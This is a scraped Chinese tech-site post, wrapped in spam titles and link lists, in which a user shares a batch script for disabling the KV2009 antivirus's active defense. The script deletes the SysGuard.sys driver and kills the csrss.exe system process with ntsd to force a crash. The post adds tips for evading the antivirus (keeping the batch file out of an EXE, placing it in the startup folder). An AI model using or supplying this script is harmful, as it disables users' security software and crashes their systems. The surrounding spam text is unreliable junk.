成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

批處理戰KV2009主動防御(無相關經驗者慎用)

安全 黑客攻防
這是一個網友對KV2009系列的測試,可能會對系統造成一些影響。所以,51CTO編輯在這里提醒您,在測試前先確定你將要做什么。

很XX,高手飄過...

今早起來一邊早飯一邊試驗的。代碼見下:

@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找進程%app_name%,準備死機...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多說了,實驗結果好像管用,我用虛擬機和真實機都分別試驗了下,還不錯。直接點的批處理腳本,如果轉成EXE效果不保證了(沒有實驗)。但是由于有關機回寫,必須強迫死機,雖然重啟后KV的變態進程守護不管用了(可以用任務管理器試試),但是在重啟之前你還得把善后工作做好,準備來日重生。有幾點得注意:

1、不能直接用批處理寫注冊表(雖然可以還原SSDT之后用API寫,但是不是我們追求的純粹R3手段)
2、最好不要把bat放在EXE里,因為運行時KV十有八九可以攔截到
3、最好的地方可能是啟動文件夾,或許還有些其他修改手段

的確是個很娛樂且沒有什么實用價值的手段...大家可以娛樂下,不過考慮到每個人的機子效果或許不同,不用報有太大希望。

特別強調:KV08/09用戶,試驗時一定要把C:\Windows\system32\drivers\SysGuard.sys拷貝個到其它地方備份,如果本實驗真的成功了,KV就實效了。只有拷貝回去下次重啟即可恢復,或者重新安裝。

【編輯推薦】

  1. 《X戰警前傳》提前泄露 FBI怒抄0day組織大本營
  2. 徹底無處可逃:研究人員展示BIOS級底層安全攻擊
  3. 美女黑客曝英特爾CPU漏洞或引發全球用戶恐慌
  4. 安全專家詳談:對付惡意軟件的策略及方法
  5. 51CTO記者親歷:尤金.卡巴斯基開啟2009中國安全行
責任編輯:王文文 來源: Left的XX實驗室
相關推薦

2009-04-21 13:02:02

2009-07-27 19:40:18

2009-04-21 14:43:31

2013-04-02 10:27:31

2014-12-29 11:13:48

2010-11-02 20:13:36

2015-12-02 10:33:40

2009-12-25 15:58:37

WPF數據處理

2011-06-30 14:04:03

2017-09-15 16:12:42

2011-06-08 17:29:20

2019-09-06 15:16:59

2009-10-13 16:37:29

2009-02-27 16:06:24

2009-06-10 11:23:15

殺毒體驗卡免費江民

2023-11-10 09:54:32

2010-01-27 10:16:04

2025-03-17 00:00:00

OT系統安全運營技術

2010-09-01 15:44:02

2009-10-26 10:00:08

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品视频一区二区三区在线观看 | 国产精品区二区三区日本 | 国产高清视频在线观看播放 | 国产精品久久欧美久久一区 | 精品一区二区三区在线观看国产 | 欧美一区二区三区大片 | 欧美精品久久 | 国产一区二区三区在线 | av中文字幕在线播放 | 人人看人人草 | 国产精品久久久久无码av | 伊人精品在线视频 | 亚洲一区二区在线播放 | 久久久精品欧美 | 欧美v日韩v | 日韩欧美不卡 | 亚洲一区二区三区四区五区中文 | 五月婷婷丁香婷婷 | 亚洲社区在线 | 久国产| 亚洲欧美精品在线观看 | 国产一区二区三区在线 | 国产高清视频 | 国产成人精品一区二区 | 成人精品一区二区三区中文字幕 | 日本久久一区 | 日韩精品极品视频在线观看免费 | 一区日韩 | 亚洲欧美精 | 在线免费观看视频你懂的 | 久久久精品一区 | 久久久久99 | www.玖玖玖| 欧美成人精品 | 欧美成人精品一区二区三区 | 一区二区三区亚洲视频 | 久久蜜桃av一区二区天堂 | 亚洲欧美视频一区 | 午夜色播| 国产精品毛片一区二区三区 | 欧美精品一区二区在线观看 |